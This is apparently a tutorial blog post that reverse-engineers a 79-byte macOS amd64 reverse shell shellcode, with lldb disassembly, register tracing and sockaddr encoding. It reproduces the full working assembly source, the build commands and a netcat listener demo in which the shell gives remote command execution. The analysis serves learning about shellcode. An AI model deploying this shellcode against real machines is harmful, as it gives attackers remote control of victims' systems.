Abstract
In this series of articles, I am analysing the pieces of shellcode written by Odzhan on the page Shellcode: Mac OSX amd64.
In this last article, we will put together what we have learnt so far and create a reverse bind shell.
Keywords
reverse bind shell, socket, sys_dup2, execve, connect.
The code
We start with compiling the code from the well-known website:
bits 64
global _main
_main:
; 79 byte reverse shell
;
bits 64
mov rcx, ~0x0100007fd2040200
not rcx
push rcx
xor ebp, ebp
bts ebp, 25
; step 1, create a socket
; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
push rbp
pop rax
cdq ; rdx=IPPROTO_IP
push 1
pop rsi ; rsi=SOCK_STREAM
push 2
pop rdi ; rdi=AF_INET
mov al, 97
syscall
xchg eax, edi ; edi=s
xchg eax, esi ; esi=2
; step 2, assign socket handle to stdin,stdout,stderr
; dup2(r, FILENO_STDIN)
; dup2(r, FILENO_STDOUT)
; dup2(r, FILENO_STDERR)
dup_loop64:
push rbp
pop rax ; eax = 0x02000000
mov al, 90 ; rax=sys_dup2
syscall
sub esi, 1
jns dup_loop64 ; jump if not signed
; step 3, connect to remote host
; connect (sockfd, {AF_INET,1234,127.0.0.1}, 16);
push rbp
pop rax
push rsp
pop rsi
mov dl, 16 ; rdx=sizeof(sa)
mov al, 98 ; rax=sys_connect
syscall
; step 4, execute /bin/sh
; execve("/bin//sh", NULL, 0);
push rax
pop rsi
push rbp
pop rax
cdq ; rdx=0
mov rbx, '/bin//sh'
push rdx ; 0
push rbx ; "/bin//sh"
push rsp
pop rdi ; "/bin//sh", 0
mov al, 59 ; rax=sys_execve
syscall
Compiling this code is no different from usual:
gbiondo@tripleX reverse connect shell % nasm -f macho64 rcs.asm
gbiondo@tripleX reverse connect shell % ld -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib -lSystem rcs.o -o reverseConnectShell
Now, from another terminal, we launch a netcat listener:
gbiondo@tripleX ~ % pwd
/Users/gbiondo
gbiondo@tripleX ~ % /usr/bin/nc -l 1234
...
And we launch the reverse shell:
gbiondo@tripleX reverse connect shell % ./reverseConnectShell
In the netcat terminal, we can now issue commands as if they were typed in the terminal that launched the shellcode:
gbiondo@tripleX ~ % /usr/bin/nc -l 1234
pwd
/Users/gbiondo/EXP312/Odzhan/reverse connect shell
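It works fine.
Note that if there is no listener to connect to, the shellcode crashes with a segmentation fault. The code never checks the return value of connect and reuses it as the second argument of execve, so a failed connection most likely makes execve fail too, and execution then runs past the end of the shellcode.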
This time we opt for another strategy to do the reverse engineering exercise. First, we collect all the launched syscalls, and we look through their documentation, if needed.
Last byte | syscall signature |
---|---|
97 | int socket(int domain, int type, int protocol); |
90 | int sys_dup2(u_int from, u_int to); |
98 | int connect(int s, caddr_t name, socklen_t namelen); |
59 | int execve(char *fname, char **argp, char **envp); |
The syscalls shouldn't be new to the aficionados of this series. However, if you have missed the earlier articles:
- We discussed execve in Come taste some shellcode...
- We discussed sys_dup2 in Binding a shell
- We discussed socket in Binding a shell
- We didn't discuss connect yet
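So the algorithm will be:
- create a socket (socket);
- redirect stdin, stdout and stderr to the socket (sys_dup2, three times);
- connect the socket to the remote host (connect);
- execute /bin/sh (execve).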
To save some time later, let's remember that, according to the System V AMD64 calling convention, the first three arguments are passed in the registers below:
syscall | RDI | RSI | RDX |
---|---|---|---|
socket | domain | type | protocol |
sys_dup2 | from | to | n/a |
connect | socket file descriptor | address | address length |
execve | path | arguments | environment variables |
As I said in a previous article, when working with projects it’s always better to view both lldb and a visual disassembler. It gives a wide view of how the same result can be achieved in different manners. For instance, the original code:
mov rcx, ~0x0100007fd2040200
not rcx
has been disassembled by lldb as:
reverseConnectShell[0x100003f69] <+0>: movabs rcx, -0x100007fd2040201
reverseConnectShell[0x100003f73] <+10>: not rcx
and by hopper as:
0000000100003f69 movabs rcx, 0xfeffff802dfbfdff
0000000100003f73 not rcx
Now, movabs and mov can be considered synonyms in this context (see this link for more information), and yet the operands are different.
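The first case, the bitwise NOT, has already been discussed in the article “Binding a shell”. We redo it once more here, flipping every bit of each byte:
~0x0100007fd2040200 = 0xfeffff802dfbfdff
This shows that the approach of the original code and the one of hopper are equivalent.
Negative numbers are obtained with 2's complement (flip all the bits, then add 1), so for the lldb operand we have:
-0x0100007fd2040201 = ~0x0100007fd2040201 + 1 = 0xfeffff802dfbfdfe + 1 = 0xfeffff802dfbfdff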
This finally proves that the three approaches are equivalent. As a point of interest, it would have been much faster to write a simple piece of code:
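#include <stdio.h>

int main(void) {
    /* operand shown by lldb, without its sign */
    long myInt = 0x100007fd2040201;
    myInt *= -1;
    /* cast: %lx expects an unsigned long */
    printf("Original number made negative, in hex: %#lx\n", (unsigned long)myInt);
    return 0;
}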
Or, damnit! you may use any scientific calculator that has programming features!
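The same cross-check can also be sketched in a few lines of Python. This is only an illustration: Python integers are unbounded, so the 64-bit register is emulated with a mask, and the names MASK64, original, hopper and lldb are made up for this example.

```python
MASK64 = (1 << 64) - 1                     # emulate a 64-bit register

original = ~0x0100007FD2040200 & MASK64    # operand as written in the NASM source
hopper = 0xFEFFFF802DFBFDFF                # operand as shown by hopper
lldb = -0x100007FD2040201 & MASK64         # operand as shown by lldb (2's complement)

# All three lines print the same 64-bit pattern
print(hex(original))
print(hex(hopper))
print(hex(lldb))

# The `not rcx` at <+10> restores the value that ends up on the stack
restored = ~original & MASK64
print(hex(restored))
```

If the three representations really are equivalent, the first three lines of output are identical and the last one is the constant that the shellcode pushes.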
Now that we agree on the data, we can proceed with the analysis. For the sake of clarity, I am subdividing the code into chunks, the separators being the syscall instructions (and the subsequent storing of the return value, if pertinent).
To make things clearer, I will also show the contents of the registers and the stack.
First chunk: invoking socket
In other words, this is the main program until the loop. The disassembled code is:
(lldb) disassemble -n main
reverseConnectShell`main:
reverseConnectShell[0x100003f69] <+0>: movabs rcx, -0x100007fd2040201
reverseConnectShell[0x100003f73] <+10>: not rcx
reverseConnectShell[0x100003f76] <+13>: push rcx
reverseConnectShell[0x100003f77] <+14>: xor ebp, ebp
reverseConnectShell[0x100003f79] <+16>: bts ebp, 0x19
reverseConnectShell[0x100003f7d] <+20>: push rbp
reverseConnectShell[0x100003f7e] <+21>: pop rax
reverseConnectShell[0x100003f7f] <+22>: cdq
reverseConnectShell[0x100003f80] <+23>: push 0x1
reverseConnectShell[0x100003f82] <+25>: pop rsi
reverseConnectShell[0x100003f83] <+26>: push 0x2
reverseConnectShell[0x100003f85] <+28>: pop rdi
reverseConnectShell[0x100003f86] <+29>: mov al, 0x61
reverseConnectShell[0x100003f88] <+31>: syscall
reverseConnectShell[0x100003f8a] <+33>: xchg eax, edi
reverseConnectShell[0x100003f8b] <+34>: xchg eax, esi
We have already seen what happens in <+0>. The operation at <+10> simply flips the bits of RCX, and the result is pushed onto the stack in <+13>.
Although the mechanism should be very clear by now, let's observe the result of the not: rcx ends up holding 0x0100007fd2040200.
What is this all about
We didn't look at the man page of the connect syscall, taking it somehow for granted. Let's do it now.
man 2 connect gives:
int connect(int socket, const struct sockaddr *address, socklen_t address_len);
DESCRIPTION
The parameter socket is a socket. If it is of type SOCK_DGRAM, this call specifies the peer with which the socket is to be associated; this address is that to which datagrams are to be sent, and the only address from which datagrams are to be received. If the socket is of type SOCK_STREAM, this call attempts to make a connection to another socket. The other socket is specified by address, which is an address in the communications space of the socket. Each communications space interprets the address parameter in its own way. Generally, stream sockets may successfully connect() only once; datagram sockets may use connect() multiple times to change their association. Datagram sockets may dissolve the association by calling disconnectx(2), or by connecting to an invalid address, such as a null address or an address with the address family set to AF_UNSPEC (the error EAFNOSUPPORT will be harmlessly returned).
Now, we have already seen a const struct sockaddr *address passed to a syscall when we analysed bind. We have seen how to calculate its length, which is 16 bytes, and how the fields are populated. Let's briefly get back to that, remembering that the author wants to invoke connect with the parameters (sockfd, {AF_INET,1234,127.0.0.1}, 16). The first and the last should be immediate to understand, so we focus on the second one, namely {AF_INET,1234,127.0.0.1}.
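- The value of the constant AF_INET is 0x02.
- 1234 is the port. In hex that value is 0x04D2, stored in network (big-endian) byte order as 0x04 0xD2.
- The remaining part, 127.0.0.1, can be represented as 0x7F 0x00 0x00 0x01.
- Finally, we know that the structure behind a const struct sockaddr *address has an initial field, sin_len, which is 1 byte long and is left at 0x00 here.
All these, taken together in memory order, give the bytes 0x00 0x02 0x04 0xD2 0x7F 0x00 0x00 0x01. Read as a little-endian 64-bit value, they form 0x0100007fd2040200, the constant loaded into rcx.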
This piece of code prepares the contents that *address will point to.
The situation before <+13> is executed is:
and after its execution we have:
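The byte layout described above can be reproduced with Python's struct module. This is a minimal sketch that assumes the BSD-style sockaddr_in layout (sin_len, sin_family, sin_port, sin_addr); the variable name head is made up for the example, and only the first 8 bytes are built, exactly like the single push in the shellcode.

```python
import socket
import struct

# Assumed BSD sockaddr_in layout: sin_len (1 byte), sin_family (1 byte),
# sin_port (2 bytes, network byte order), sin_addr (4 bytes)
head = struct.pack(
    "!BBH4s",
    0x00,                            # sin_len, left at zero
    2,                               # sin_family = AF_INET
    1234,                            # sin_port
    socket.inet_aton("127.0.0.1"),   # sin_addr
)

# Bytes in the order they sit in memory
print(head.hex(" "))

# x86-64 is little-endian, so the same bytes loaded as one 64-bit value read as:
as_qword = int.from_bytes(head, "little")
print(hex(as_qword))
```

The second value printed is the one to compare with the immediate that the code moves into rcx.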
The next instruction (<+14>) zeroes ebp, the lower 32 bits of rbp; as a side effect, the upper 32 bits of rbp are zeroed as well. The one after (<+16>) sets bit 25 (0x19 = 25, that is, the 26th bit counting from one) of the register to 1.
This prepares the value 0x0000000002000000 for the syscalls without generating null bytes. It is built once and then reused as a constant while preparing each syscall. In fact, the very next two operations push the value onto the stack (<+20>) and pop it into rax (<+21>).
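As a quick sanity check, the way the syscall numbers are assembled can be sketched in Python. The names UNIX_CLASS and syscall_number are hypothetical helpers for this example; the low bytes are the ones that appear in the `mov al, ...` instructions of the listing.

```python
UNIX_CLASS = 1 << 25   # the value left in ebp by `xor ebp, ebp` + `bts ebp, 25`

def syscall_number(low_byte):
    """Emulate `push rbp / pop rax / mov al, low_byte`: only the lowest byte changes."""
    return (UNIX_CLASS & ~0xFF) | low_byte

for name, low in [("socket", 97), ("dup2", 90), ("connect", 98), ("execve", 59)]:
    print(f"{name:8s} {syscall_number(low):#010x}")
```

Each printed value is what rax contains when the corresponding syscall instruction is reached.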
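The CDQ instruction (<+22>) sign-extends eax into edx. Since the sign bit of eax is clear, edx becomes 0, and writing a 32-bit register also clears the upper half of RDX, so RDX is 0.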
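The behaviour of cdq can be modelled with a tiny Python function. This is only a sketch of the sign extension; the function name cdq is chosen for the example and it returns just the value that would land in edx.

```python
def cdq(eax):
    """Return the value cdq places in edx for a given 32-bit eax."""
    eax &= 0xFFFFFFFF
    # edx is filled with copies of the sign bit (bit 31) of eax
    return 0xFFFFFFFF if eax & 0x80000000 else 0x00000000

print(hex(cdq(0x02000000)))   # the value held by eax at <+22>: sign bit clear
print(hex(cdq(0x80000000)))   # counter-example: sign bit set
```

This is why the trick only works as a way of zeroing rdx when eax is known to be non-negative.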
The effect of the two instructions <+23> and <+25> is to store the value 1 into rsi without generating null-bytes:
and similarly, with <+26> and <+28> the value 2 is stored into rdi without generating null-bytes:
Finally, in <+29>, the first syscall is prepared: writing 0x61 (97) into al turns rax into 0x2000061, the number of socket. The situation before and after the syscall is reported below, changes highlighted in red:
A new socket is created, and its file descriptor (3) is stored into rax.
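The remaining two instructions (namely, <+33> and <+34>) shuffle three registers: the first swaps eax and edi, so that edi holds the socket (3) and eax holds 2; the second swaps eax and esi, so that esi holds 2 and eax holds 1. At the end of the execution we have: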
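The two exchanges are easy to replay in Python. This sketch models the registers as a dictionary, an illustration device only, and assumes that socket returned 3 as in the run shown in this article.

```python
# Register state right after the socket syscall (assuming it returned 3)
regs = {"eax": 3, "edi": 2, "esi": 1}

def xchg(regs, a, b):
    """Swap the contents of two registers, like the xchg instruction."""
    regs[a], regs[b] = regs[b], regs[a]

xchg(regs, "eax", "edi")   # <+33>: edi = socket, eax = 2
xchg(regs, "eax", "esi")   # <+34>: esi = 2, eax = 1
print(regs)
```

After the two swaps, edi carries the socket and esi carries 2, which is exactly what the dup2 loop needs as its starting point.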
Time to look at the next chunk
dup_loop64
Note that the numbering of the offsets restarts at the label, but since there's no further label, lldb keeps counting from dup_loop64 even after the jump instruction. This is actually meaningful, from the point of view of the assembly language - the humans must adapt to that :) But we won't surrender, and we'll stubbornly keep on subdividing into smaller chunks :)
reverseConnectShell[0x100003f8c] <+0>: push rbp
reverseConnectShell[0x100003f8d] <+1>: pop rax
reverseConnectShell[0x100003f8e] <+2>: mov al, 0x5a
reverseConnectShell[0x100003f90] <+4>: syscall
reverseConnectShell[0x100003f92] <+6>: sub esi, 0x1
reverseConnectShell[0x100003f95] <+9>: jns 0x100003f8c ; <+0>
At a glance, this routine is very easy to reverse: <+0>, <+1>, and <+2> prepare the syscall (<+4>), which uses the value of rsi. The initial value of rsi is 2 (STDERR), then it becomes 1 (STDOUT), and finally 0, which corresponds to STDIN. In short, this associates the socket file descriptor (rdi, never changing) with the three aforementioned streams. In fact, at each iteration rsi is decremented (<+6>), and the jump is performed only upon non-negative results (<+9>). Easy peasy.
We show a quick example of how the registers are impacted by this loop. The initial push and pop:
and the final ones:
When the loop terminates, the values of the registers are as follows:
This closes the dup_loop64 chunk.
Connect
This may seem the trickiest part of the whole exercise, because it really deals with the stack.
The code is:
reverseConnectShell[0x100003f97] <+11>: push rbp
reverseConnectShell[0x100003f98] <+12>: pop rax
reverseConnectShell[0x100003f99] <+13>: push rsp
reverseConnectShell[0x100003f9a] <+14>: pop rsi
reverseConnectShell[0x100003f9b] <+15>: mov dl, 0x10
reverseConnectShell[0x100003f9d] <+17>: mov al, 0x62
reverseConnectShell[0x100003f9f] <+19>: syscall
Let us focus on the contents of the stack first. The stack pointer (rsp) contains the value 0x00007FF7BFEFFA20. At this location, the stack contains the previously built struct sockaddr. By now, the effect of the instructions <+11> and <+12> should be clear: they prepare the syscall number. After their execution, the stack pointer still contains the struct's address. That address is then copied into rsi with the usual push/pop mechanism (<+13> and <+14>), thus populating the second parameter of the syscall. The third parameter must be stored in rdx, whose lowest byte is set to 0x10 in <+15>. Finally, rdi, which contains the file descriptor of the socket, hasn't changed. The syscall number is completed in <+17> and the syscall is invoked in <+19>.
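For comparison, the socket and connect steps can be reproduced at a higher level with Python's socket module. This is a hedged sketch, not a translation of the shellcode: it stands in for the netcat listener with a socket in the same process, uses an ephemeral port instead of 1234 to avoid clashes, and does not spawn any shell.

```python
import socket

# Stand-in for `nc -l 1234`: a listener on an ephemeral loopback port
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))
listener.listen(1)
port = listener.getsockname()[1]

# Counterpart of socket(AF_INET, SOCK_STREAM, IPPROTO_IP) and connect(s, &sa, 16)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
client.connect(("127.0.0.1", port))

# The listener side now sees the incoming connection
peer, _ = listener.accept()
client.sendall(b"hello\n")
received = peer.recv(16)
print(received)

for s in (peer, client, listener):
    s.close()
```

The library hides the sockaddr structure and its length behind the ("127.0.0.1", port) tuple; in the shellcode those are the bytes on the stack and the 0x10 in dl.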
The final part is the execution of the shell. We have already analysed it in previous articles, so please refer to them.
Conclusions
The aim of this series was multifold. First of all, I wanted to show that even with no assembly talent, we can understand shellcode (and we built some of that talent in this process, indeed!). I also wanted to show how to do static analysis. It's a lengthy process (the technical term is PitA), error-prone, but gives lots of satisfaction. Assembly is not that harsh monstrosity one expects it to be. It's not easy either, anyway, so you may want to build further skills on that. We have also seen some binary analysis.
... and all this, just by reverse engineering!